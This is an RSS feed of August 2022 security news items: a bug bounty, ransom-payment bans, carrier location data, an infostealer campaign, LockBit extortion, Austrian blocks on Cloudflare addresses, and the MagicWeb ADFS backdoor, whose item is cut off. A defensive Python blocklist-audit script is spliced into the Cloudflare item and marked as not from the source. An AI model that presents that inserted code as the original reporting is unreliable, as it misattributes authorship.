<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/115/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Google Launches Major Open Source Bug Bounty Program</title><link>https://nsaneforums.com/news/security-privacy-news/google-launches-major-open-source-bug-bounty-program-r8061/</link><description><![CDATA[<p>
	Google today announced a new program designed to reward researchers that find bugs in its open source projects.
</p>

<p>
	<br />
	The Open Source Software Vulnerability Rewards Program (OSS VRP) will incentivize ethical hackers to make open source code more secure in major projects that Google maintains such as Golang, Bazel, Angular, Fuchsia and Protocol buffers.
</p>

<p>
	<br />
	The OSS VRP will specifically focus on all up-to-date versions of open source software and repository settings stored in the public repositories of Google-owned GitHub organizations, as well as these projects’ dependencies.
</p>

<p>
	<br />
	Google said it welcomes submissions of:
</p>

<p>
	 
</p>

<ul>
	<li>
		Vulnerabilities that lead to supply chain compromise
	</li>
	<li>
		 Design issues that cause product vulnerabilities
	</li>
	<li>
		 Other issues such as sensitive or leaked credentials, weak passwords or insecure installations
	</li>
</ul>

<p>
	 
</p>

<p>
	“Depending on the severity of the vulnerability and the project’s importance, rewards will range from $100 to $31,337,” the tech giant said. “The larger amounts will also go to unusual or particularly interesting vulnerabilities, so creativity is encouraged.”
</p>

<p>
	<br />
	The OSS VRP will sit alongside Google’s VRPs in Chrome, Android and other parts of the business. Since the first was launched around 12 years ago, these programs have rewarded over 13,000 submissions and paid out more than $38m in the process.
</p>

<p>
	<br />
	Open source vulnerabilities are big news following the Log4Shell exploit and the subsequent fallout. Many DevOps teams now use third-party open source components to accelerate time-to-market for their offerings, but repositories often contain bugs.
</p>

<p>
	<br />
	One vendor detected a 650% year-on-year increase in attacks where threat actors have deliberately planted buggy code in upstream libraries so that they can exploit it at a later date.
</p>

<p>
	<br />
	Another report from June claimed that the average application development project contains 49 vulnerabilities spanning 80 direct dependencies. It added that the time taken to fix open source vulnerabilities is almost 20% longer than in proprietary projects, and has lengthened from 49 days in 2018 to 110 days in 2021.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.infosecurity-magazine.com/news/google-open-source-bug-bounty/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">8061</guid><pubDate>Tue, 30 Aug 2022 13:07:18 +0000</pubDate></item><item><title>As Hacker Attacks Rise, States Start to Consider Banning Ransom Payments</title><link>https://nsaneforums.com/news/security-privacy-news/as-hacker-attacks-rise-states-start-to-consider-banning-ransom-payments-r8057/</link><description><![CDATA[<p>
	Online attacks in which criminals seize control of victims’ data are rising, and government agencies are far from immune. That’s now leading states to consider laws prohibiting state agencies from paying ransoms to get the decryption key that would unlock what are often vital files.
</p>

<p>
	<br />
	North Carolina in May and Florida in July put into effect laws that ban payment of ransoms in such cases, and more states are expected to follow suit with their own versions of such bans, Bankinfosecurity reports.
</p>

<p>
	<br />
	In the case of North Carolina, the new law requires immediate reports of any ransomware attacks to state authorities. In addition to banning payments, it bars victimized state agencies from talking to the attackers. Florida's law doesn't bar such communication, according to the report. Pennsylvania's senate in January passed a ban on state agencies paying ransom, and similar bans are being debated in Arizona, New Jersey, New York, and Texas, the Bankinfosecurity report says, citing reporting by CPO Magazine.
</p>

<p>
	 
</p>

<p>
	States are starting to consider such laws in response to a rising tide of ransomware attacks, many of which victimize private organizations but also target government agencies, including school districts.
</p>

<p>
	<br />
	And such attacks have multiplied rapidly in recent years as online thieves shift tactics to exploit weaknesses in victims’ defenses, allowing the attackers to realize payoffs not from the outright sale of stolen data but from demanding ransom payments from the victims. The problem is global. Some 79% of cybersecurity professionals around the world reported in April that their organizations had been hit by a ransomware attack in the past 12 months.
</p>

<p>
	<br />
	Meanwhile, the fraction of all data breaches that involve a ransom demand has ballooned from less than 1% of all breach incidents in 2016 to 21% last year, according to data from Risk Based Security Inc.
</p>

<p>
	<br />
	With such attacks, online criminals encrypt data stored by victim companies or agencies and then demand payment to supply the decryption key. Once obtained, the key may or may not unlock the data. The average ransom payment across all businesses globally is about $170,000, according to the security firm Sophos.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.digitaltransactions.net/as-hacker-attacks-rise-states-start-to-consider-banning-ransom-payments/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">8057</guid><pubDate>Mon, 29 Aug 2022 20:43:57 +0000</pubDate></item><item><title>Wireless carriers keep your location data for years and provide it to the police</title><link>https://nsaneforums.com/news/security-privacy-news/wireless-carriers-keep-your-location-data-for-years-and-provide-it-to-the-police-r8056/</link><description><![CDATA[<p>
	<strong>Washington (CNN Business)</strong> The country's largest wireless carriers not only know where you are every time you make a phone call or use your data connection, but they routinely hold onto that location information for months and in some cases years, providing it to law enforcement whether you like it or not, according to carrier letters made public last week by the Federal Communications Commission.
</p>

<p>
	<br />
	From data about which cell towers your smartphone has been communicating with to your specific GPS coordinates, your smartphone constantly gives off a tremendous amount of information on your whereabouts, the letters from AT&amp;T, Verizon and other carriers show.
</p>

<p>
	<br />
	For example, T-Mobile retains granular latitude and longitude coordinates of devices on its network for up to 90 days, and less-granular cell-site location data for up to two years, the company told the FCC in a letter dated Aug. 3. Verizon said it holds cell-site data for up to one year, while AT&amp;T said it may retain cell-site data for up to five years.
</p>

<p>
	<br />
	The company letters highlight how telecom companies, and not just tech platforms, cooperate with government requests for personal information — an issue that's received intense scrutiny in recent months as new state laws restricting abortion have prompted critics to worry about cellular location data being used to prosecute abortion-seekers. In addition to sending official data requests to companies, government agencies have also resorted to simply buying personal data from the open market themselves, a practice US lawmakers have questioned authorities about this year.
</p>

<p>
	<br />
	That sensitive data, privacy advocates have said, can reveal whether a person may have visited an abortion clinic or sought other reproductive care, even if the location data was merely collected for the purposes of facilitating an unrelated call or mobile web search at the time.
</p>

<p>
	<br />
	"Governments collect information for many reasons. But, all too often, data collected by the state is misused and weaponized for other purposes," the Electronic Frontier Foundation, a digital rights group, wrote in a blog post this spring.
</p>

<p>
	<br />
	FCC Chairwoman Jessica Rosenworcel didn't explicitly mention potential risks related to reproductive care or abortion in her letters to more than a dozen top US wireless carriers in July. But the inquiries came less than a month after the Supreme Court's decision to overturn federal abortion rights in June, and amid heightened scrutiny of the many companies that handle location information and how they might respond to law enforcement requests for that data in connection with abortion prosecutions.
</p>

<p>
	<br />
	"Given the highly sensitive nature of this data — especially when location data is combined with other types of data, the ways in which this data is stored and shared with third parties is of utmost importance to consumer safety and privacy," Rosenworcel wrote at the time.
</p>

<p>
	<br />
	Last week, Rosenworcel added she has called on the FCC's enforcement bureau to investigate whether wireless carriers are doing enough to tell customers how their information is handled.
</p>

<p>
	<br />
	There are many reasons a wireless carrier collects location information from subscribers, the companies told the FCC. One main reason is simply to operate the network as consumers would expect. But there are other reasons, too. For example, FCC rules require that carriers provide detailed information to 911 dispatchers in an emergency, down to a device's likely elevation so that first responders can more easily locate someone in need if they are on the fifth floor of a building.
</p>

<p>
	<br />
	Carriers also collect location data for purposes that don't directly relate to the provision of wireless services. Verizon, for example, told the FCC it may use location data as part of an offering to third-parties that can "develop insights to help estimate traffic patterns during the morning rush hour or how many customers go to a retail store." AT&amp;T told the FCC it may collect location information in order to serve subscribers targeted ads.
</p>

<p>
	<br />
	While in some cases consumers may be able to opt out of this data collection — such as with AT&amp;T's advertising program — they generally cannot opt out of having their location data shared with law enforcement, the carrier letters said.
</p>

<p>
	<br />
	"Like all companies, we are required by law to provide information to law enforcement and other government entities by complying with court orders, subpoenas, and lawful discovery requests," AT&amp;T wrote to the FCC. "In all cases, we review requests to determine whether they are valid."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.cnn.com/2022/08/29/tech/wireless-carriers-locations-fcc/index.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">8056</guid><pubDate>Mon, 29 Aug 2022 20:37:57 +0000</pubDate></item><item><title>Fake 'Cthulhu World' P2E project used to push info-stealing malware</title><link>https://nsaneforums.com/news/security-privacy-news/fake-cthulhu-world-p2e-project-used-to-push-info-stealing-malware-r8052/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Hackers have created a fake 'Cthulhu World' play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to push the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware onto unsuspecting victims.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As play-to-earn games rise in popularity, scammers and threat actors increasingly target these new platforms for malicious activities.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Such is the case with a new malware distribution campaign discovered by cybersecurity researcher <a href="https://iamdeadlyz.medium.com/?source=user_profile-------------------------------------" rel="external nofollow">iamdeadlyz</a>, where threat actors created a whole project to promote a fake play-to-earn game called Cthulhu World.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">To promote the "project", threat actors are sending direct messages to users on Twitter asking if they would like to perform a test of their new game. In return for testing and promoting the game, <a href="https://twitter.com/Iamdeadlyz/status/1562821456492314625" rel="external nofollow">iamdeadlyz says</a> that the threat actors promise a reward in Ethereum.</span>
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="twitter-direct-messages.jpg" class="ipsImage" data-ratio="75.10" height="509" width="720" src="https://www.bleepstatic.com/images/news/malware/c/cthulhu-world/twitter-direct-messages.jpg" />
	</p>

	<p>
		<span style="font-size:14px;">Twitter DMs promoting the fake P2E game - Source: iamdeadlyz</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">When visiting the cthulhu-world.com site, which is now down, users are greeted with a well-designed website, containing information about the project and an interactive map of the game's environments.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="cthulhu-world-map.jpg" class="ipsImage" data-ratio="75.10" height="466" width="720" src="https://www.bleepstatic.com/images/news/malware/c/cthulhu-world/cthulhu-world-map.jpg" />
</div>

<div>
	<span style="font-size:14px;">Cthulhu World website</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">However, this site appears to be a clone of the legitimate <a href="https://twitter.com/AlchemicWorld" rel="external nofollow">Alchemic World project</a>, which has been <a href="https://twitter.com/AlchemicWorld/status/1558592384681787397" rel="external nofollow">warning users</a> to stay away from the fake project.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Cthulhu World website also has one big difference: clicking the arrow in the upper right-hand corner of the site takes the visitor to a webpage asking for a code to download the "alpha" test of the project.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The threat actors share these codes with prospective victims as part of their DM conversations on Twitter. A list of the access codes is also found in the site's source code, as shown below.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="codes.jpg" class="ipsImage" data-ratio="63.75" height="296" width="720" src="https://www.bleepstatic.com/images/news/malware/c/cthulhu-world/codes.jpg" />
</div>

<div>
	<span style="font-size:14px;">Access codes for the various downloads - Source: BleepingComputer</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Depending on the code entered, one of three files will be downloaded from Dropbox.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="download-urls.jpg" class="ipsImage" data-ratio="12.64" height="58" width="720" src="https://www.bleepstatic.com/images/news/malware/c/cthulhu-world/download-urls.jpg" />
</div>

<div>
	<span style="font-size:14px;">Download links embedded in the site source code - Source: BleepingComputer</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Each of the three files installs a different malware family, likely allowing the threat actors to pick and choose how they wish to target a particular user. The three families identified in AnyRun analyses are <a href="https://app.any.run/tasks/dd510050-36e6-43e7-b841-53fbf948605d" rel="external nofollow">AsyncRAT</a>, <a href="https://app.any.run/tasks/8f15678f-1752-427b-a612-9ded7f28c2ad" rel="external nofollow">RedLine Stealer</a>, and <a href="https://app.any.run/tasks/21115d52-4df8-4c7e-ac77-5384c5ba0513asd" rel="external nofollow">Raccoon Stealer</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The website for Cthulhu World is currently down, but their Discord remains active. It is unclear who on this Discord is aware that the site is distributing malware, but some users clearly believe this is a legitimate project.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As RedLine Stealer and Raccoon Stealer are known to <a href="https://www.bleepingcomputer.com/news/security/fake-binance-nft-mystery-box-bots-steal-victims-crypto-wallets/" rel="external nofollow">steal cryptocurrency wallets</a>, it is not surprising to find that some victims have already had their wallets cleaned out by this scam.</span>
</p>

<p>
	 
</p>

<p>
	<img alt="victim-tweet.jpg" class="ipsImage" data-ratio="75.10" height="482" width="720" src="https://www.bleepstatic.com/images/news/malware/c/cthulhu-world/victim-tweet.jpg" />
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">If you have visited Cthulhu-world.com and downloaded any of their software, you should immediately run an antivirus scan on your computer and remove anything detected.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Furthermore, as these malware families steal your saved passwords, cookies, and crypto wallets, you should reset all passwords (from a device you know is clean) and move your cryptocurrency into newly created wallets.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Ultimately, though, the wisest course of action is to reinstall your computer from scratch, as these malware infections provide full access to an infected computer, and other undetected malware may still be installed.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Source: BleepingComputer</span>
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/fake-cthulhu-world-p2e-project-used-to-push-info-stealing-malware/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/fake-cthulhu-world-p2e-project-used-to-push-info-stealing-malware/</a></span>
</p>
]]></description><guid isPermaLink="false">8052</guid><pubDate>Mon, 29 Aug 2022 18:55:47 +0000</pubDate></item><item><title>LockBit ransomware gang gets aggressive with triple-extortion tactic</title><link>https://nsaneforums.com/news/security-privacy-news/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic-r8048/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The LockBit ransomware gang has announced that it is improving defenses against distributed denial-of-service (DDoS) attacks and working to take the operation to a triple extortion level.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The gang has recently suffered a DDoS attack, allegedly on behalf of digital security giant Entrust, that prevented access to data published on its corporate leaks site.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Data from Entrust was stolen by LockBit ransomware in an attack on June 18, according to a BleepingComputer source. The <a href="https://www.bleepingcomputer.com/news/security/digital-security-giant-entrust-breached-by-ransomware-gang/" rel="external nofollow">company confirmed the incident</a> and that data had been stolen.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Entrust did not pay the ransom and LockBit <a href="https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-security-giant-entrust-leaks-data/" rel="external nofollow">announced</a> that it would publish all the stolen data on August 19. This did not happen, though, because the gang’s leak site was hit by a <a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-blames-entrust-for-ddos-attacks-on-leak-sites/" rel="external nofollow">DDoS attack believed to be connected to Entrust</a>.</span>
</p>

<h3>
	<span style="font-size:14px;">LockBit getting into DDoS</span>
</h3>

<p>
	<span style="font-size:14px;">Earlier this week, LockBitSupp, the public-facing figure of the LockBit ransomware operation, announced that the group is back in business with a larger infrastructure intended to keep its leaks accessible even under DDoS attack.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The DDoS attack last weekend that put a temporary stop to leaking Entrust data was seen as an opportunity to explore the triple extortion tactic to apply more pressure on victims to pay a ransom.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">LockBitSupp said that the ransomware operator is now looking to add DDoS as an extortion tactic on top of encrypting data and leaking it.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“I am looking for dudosers [DDoSers] in the team, most likely now we will attack targets and provide triple extortion, encryption + date leak + dudos, because I have felt the power of dudos and how it invigorates and makes life more interesting,” LockBitSupp wrote in a post on a hacker forum.</span>
</p>

<h3>
	<span style="font-size:14px;">Leaking Entrust data</span>
</h3>

<p>
	<span style="font-size:14px;">The gang also promised to share over torrent 300GB of data stolen from Entrust so “the whole world will know your secrets.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">LockBit’s spokesperson said that they would share the Entrust data leak privately with anyone that contacts them before making it available over torrent.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">It appears that LockBit has kept its promise and released this weekend a torrent called “entrust.com” with 343GB of files.</span>
</p>

<p>
	 
</p>

<div>
	<span style="font-size:14px;"><a href="http://twitter.com/masterchaerge/status/1563525794785140738" rel="external nofollow"><img alt="LockBit ransomware shares Entrust data over torrent" data-ratio="91.53" src="https://www.bleepstatic.com/images/news/u/1100723/2022/LockBit_EntrustLeak.jpg" /></a></span>
</div>

<div>
	<span style="font-size:14px;">Lockbit ransomware leaks Entrust data - source: Artie Yamamoto</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">The operators wanted to make sure that Entrust's data is available from multiple sources and, besides publishing it on their site, they also shared the torrent over at least two file storage services, with one of them no longer making it available.</span>
</p>

<h3>
	<span style="font-size:14px;">DDoS defenses</span>
</h3>

<p>
	<span style="font-size:14px;">One method already implemented against further DDoS attacks is to put a unique link in each victim's ransom note instead of one shared address.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“The function of randomization of links in the notes of the locker has already been implemented, each build of the locker will have a unique link that the dudoser [DDoSer] will not be able to recognize,” LockBitSupp posted.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">They also announced an increase in the number of mirrors and duplicate servers, and a plan to increase the availability of stolen data by making it accessible over clearnet, too, via a bulletproof storage service.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="LockBitChanges.png" class="ipsImage" data-ratio="75.10" height="414" width="720" src="https://www.bleepstatic.com/images/news/u/1100723/2022/LockBitChanges.png" />
</div>

<div>
	<span style="font-size:14px;">Lockbit ransomware changes after suffering DDoS attack - source: BleepingComputer</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">After publishing this article, BleepingComputer learned that LockBit has made the stolen Entrust data available over clearnet, on a website that provides files for a limited period.</span>
</p>

<p>
	 
</p>

<div>
	<span style="font-size:14px;"><img alt="LockBit makes stolen Entrust data available over clearnet" data-ratio="64.12" src="https://www.bleepstatic.com/images/news/u/1100723/2022/LockBit_Entrust_Clearnet.jpg" /></span>
</div>

<div>
	<span style="font-size:14px;">LockBit shares over clearnet the torrent for stolen Entrust data - source: BleepingComputer (h/t <a href="https://twitter.com/threatosint" rel="external nofollow">DJX</a>)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">The LockBit ransomware operation has been active for almost three years, since September 2019. At the time of writing, LockBit's data leak site is up and running.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The gang is listing more than 700 victims and Entrust is one of them, with data for the company leaked on August 27.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Source: BleepingComputer</span>
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/</a>
</p>
]]></description><guid isPermaLink="false">8048</guid><pubDate>Mon, 29 Aug 2022 18:48:37 +0000</pubDate></item><item><title>Cloudflare CDN clients caught in Austrian fight against pirate sites</title><link>https://nsaneforums.com/news/security-privacy-news/cloudflare-cdn-clients-caught-in-austrian-fight-against-pirate-sites-r8046/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Excessive and indiscriminate blocking is underway in Austria, where internet service providers (ISPs) complying with a court order to block pirate sites are causing significant collateral damage.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The legal case was launched by the copyright organization “LSG – Wahrnehmung von Leistungsschutzrechten GesmbH”, which convinced an Austrian court to <a href="http://netzsperre.liwest.at/" rel="external nofollow">block 14 websites</a> for copyright law violations.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The problem with this measure is that the blocks also extended to IP addresses belonging to Cloudflare's CDN, which serve many other sites that do not violate copyright law.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.lteforum.at/mobilfunk/webseite-von-manchen-providern-aus-nicht-erreichbar-timeout.19874/" rel="external nofollow">Examples</a> of impacted websites include Magenta, Salzburg AG, the Preis Zone shop, yesss!, Raiffeisen Mobil, SOS Mitmensch, and Hutchison Drei Austria GmbH.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As <a href="https://www.derstandard.at/story/2000138619757/ueberzogene-netzsperre-sorgt-fuer-probleme-im-oesterreichischen-internet" rel="external nofollow">Austrian DerStandard</a> comments in a report on the matter, the root of the problem is that the copyright organization provided a list of IP addresses that ISPs banned without checking who used them.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As it turned out, the list also <a href="https://web.archive.org/web/20220828220559/http://netzsperre.liwest.at/" rel="external nofollow">included</a> a set of at least nine IP addresses that Cloudflare uses for its CDN to provide services (security, reliability, performance) to legitimate websites.</span>
</p>

<pre><span style="font-size:14px;">104.31.16.119
104.26.12.95
172.67.175.231
188.114.97.12
104.21.88.201
188.114.96.12
104.21.69.123
104.21.6.167
104.21.36.27</span></pre>
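<p>
	<span style="font-size:14px;">The check the ISPs evidently skipped is cheap to run before a list is enforced: test every address against the CDN's published ranges, because an address inside them is an anycast edge shared by many unrelated sites. The script below is an added example and is not code from BleepingComputer, Cloudflare or the article. It assumes that CLOUDFLARE_IPV4 matches the list Cloudflare publishes at https://www.cloudflare.com/ips-v4 (copied as of 2022; refresh it before real use) and takes the nine addresses quoted above as its sample blocklist.</span>
</p>

```python
"""Audit a proposed IP blocklist for shared CDN edges before it is enforced.

Added example; not code from the article, Cloudflare or BleepingComputer.
Assumptions: CLOUDFLARE_IPV4 is copied from https://www.cloudflare.com/ips-v4
(as of 2022) and BLOCKLIST holds the nine addresses quoted in the article.
"""
import ipaddress
from typing import Dict, Iterable, List, Optional

CLOUDFLARE_IPV4 = [
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
]

# The addresses the article says appeared on the LSG list.
BLOCKLIST = [
    "104.31.16.119", "104.26.12.95", "172.67.175.231", "188.114.97.12",
    "104.21.88.201", "188.114.96.12", "104.21.69.123", "104.21.6.167",
    "104.21.36.27",
]


def build_networks(cidrs: Iterable[str]) -> List[ipaddress.IPv4Network]:
    """Parse CIDR strings once; a malformed entry raises instead of being skipped."""
    return [ipaddress.ip_network(c, strict=True) for c in cidrs]


def matching_range(ip: str, networks: List[ipaddress.IPv4Network]) -> Optional[str]:
    """Return the published CIDR that contains ip, or None if no range does."""
    addr = ipaddress.ip_address(ip)
    for net in networks:
        if addr.version == net.version and addr in net:
            return str(net)
    return None


def audit_blocklist(blocklist: Iterable[str], cidrs: Iterable[str]) -> Dict[str, Optional[str]]:
    """Map every blocklist entry to the CDN range containing it (None = no hit)."""
    nets = build_networks(cidrs)
    return {ip: matching_range(ip, nets) for ip in blocklist}


def shared_edges(blocklist: Iterable[str], cidrs: Iterable[str]) -> List[str]:
    """Entries that must not be blocked by bare IP because they are shared CDN edges."""
    return [ip for ip, net in audit_blocklist(blocklist, cidrs).items() if net is not None]


if __name__ == "__main__":
    report = audit_blocklist(BLOCKLIST, CLOUDFLARE_IPV4)
    for ip, net in report.items():
        if net:
            verdict = f"shared CDN edge ({net}): block by hostname, not by IP"
        else:
            verdict = "no CDN hit: still confirm ownership via WHOIS/rDNS"
        print(f"{ip:16} {verdict}")
    print(f"\n{len(shared_edges(BLOCKLIST, CLOUDFLARE_IPV4))} of {len(BLOCKLIST)} addresses are Cloudflare edges")
```

<p>
	<span style="font-size:14px;">A hit means an IP-level block takes down every site behind that edge, so the order has to be enforced by hostname (DNS or TLS SNI) instead. A miss is not proof of safety: Cloudflare trims its published list over time, and other CDNs and shared hosts are not covered, so addresses with no hit still need a WHOIS or reverse-DNS check before they go into a filter.</span>
</p>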

<p>
	<span style="font-size:14px;">According to the same outlet, Cloudflare has confirmed the problem and has notified affected customers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">At the moment, the list of banned addresses has been revised and the IPs listed above are no longer part of it.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">BleepingComputer has contacted both Cloudflare and the intellectual property protection firm for a comment on the matter, and we will update this story as soon as we receive a response.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Meanwhile, tech-savvy Austrian users have found that using VPN tools helps circumvent the blocks, but this solution isn’t suitable for all users, and in most cases it comes with a price tag.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Source: BleepingComputer</span>
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/cloudflare-cdn-clients-caught-in-austrian-fight-against-pirate-sites/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/cloudflare-cdn-clients-caught-in-austrian-fight-against-pirate-sites/</a></span>
</p>
]]></description><guid isPermaLink="false">8046</guid><pubDate>Mon, 29 Aug 2022 18:44:59 +0000</pubDate></item><item><title>Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows-r8042/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">As a state-sponsored cyberespionage actor, APT29 employs the new capability to hide their presence on the networks of their targets, typically government and critical organizations across Europe, the U.S., and Asia.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Dubbed ‘MagicWeb’, the new malicious tool is an evolution of ‘<a href="https://www.bleepingcomputer.com/news/security/microsoft-nobelium-uses-custom-malware-to-backdoor-windows-domains/" rel="external nofollow">FoggyWeb</a>’, which allowed hackers to exfiltrate the configuration database of compromised Active Directory Federation Services (ADFS) servers, decrypt token-signing and token-decryption certificates, and fetch additional payloads from the command and control (C2) server.</span>
</p>

<p>
	 
</p>

<div>
	<p>
		<span style="font-size:14px;">AD FS relies on claims-based authentication to validate the identity of the user and their authorization claims. These claims are packaged into a token that can be used for authentication. MagicWeb injects itself into the claims process to perform malicious actions outside the normal roles of an AD FS server.</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">The MagicWeb tool replaces a legitimate DLL used by ADFS with a malicious version to manipulate user authentication certificates and to modify the claims passed in tokens generated by the compromised server.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Because ADFS servers facilitate user authentication, MagicWeb can help APT29 validate authentication for any user account on that server, giving them persistence and an abundance of pivoting opportunities.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="ADFS authentication process" data-ratio="36.53" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/ADFS-diagram.png" />
</div>

<div>
	<span style="font-size:14px;">ADFS authentication process (Microsoft)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">MagicWeb requires APT29 to first gain admin access to the target ADFS server and replace the said DLL with their version, but Microsoft reports that this has already happened in at least one case its Detection and Response Team (DART) was called in to investigate.</span>
</p>

<h2>
	<span style="font-size:14px;">MagicWeb details</span>
</h2>

<p>
	<span style="font-size:14px;">Microsoft observed NOBELIUM replace the “Microsoft.IdentityServer.Diagnostics.dll” with a backdoored version that features an additional section in the ‘TraceLog’ class.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="New section in the TraceLog class" data-ratio="75.10" width="719" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/new-section.png" />
</div>

<div>
	<span style="font-size:14px;">New header section in the TraceLog class (Microsoft)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">This new section is a static constructor executed once during the loading of the DLL when launching the ADFS server.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The goal of the constructor is to hook four legitimate ADFS functions, namely “Build”, “GetClientCertificate”, “EndpointConfiguration”, and “ProcessClaims”.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The hooked functions enable the Russian hackers to perform the following actions:</span>
</p>

<ul>
	<li>
		<span style="font-size:14px;">BeginBuild() - Subvert the normal certificate inspection/build process by introducing a custom method invoked before “Build()”.</span>
	</li>
	<li>
		<span style="font-size:14px;">BeginGetClientCertificate() - Force the application to accept a non-valid client certificate as valid, as long as the OID value matches either of the hardcoded MD5 values in MagicWeb.</span>
	</li>
	<li>
		<span style="font-size:14px;">BeginEndpointConfiguration() - Allow WAP to pass the request with the specific malicious certificate to ADFS for further authentication processing.</span>
	</li>
	<li>
		<span style="font-size:14px;">BeginProcessClaims() - Ensure that fraudulent claims with the MagicWeb OID value are added to the list of claims returned to the caller of the legitimate hooked method (ProcessClaims).</span>
	</li>
</ul>

<h2>
	<span style="font-size:14px;">Hunting for MagicWeb</span>
</h2>

<p>
	<span style="font-size:14px;">Microsoft recommends that defenders follow the <a href="https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/#hunting-guidance" rel="external nofollow">hunting guidance</a> provided in the report. Indicators of compromise (IoCs) have not been shared as they wouldn’t be very helpful.</span>
</p>

<p>
	 
</p>

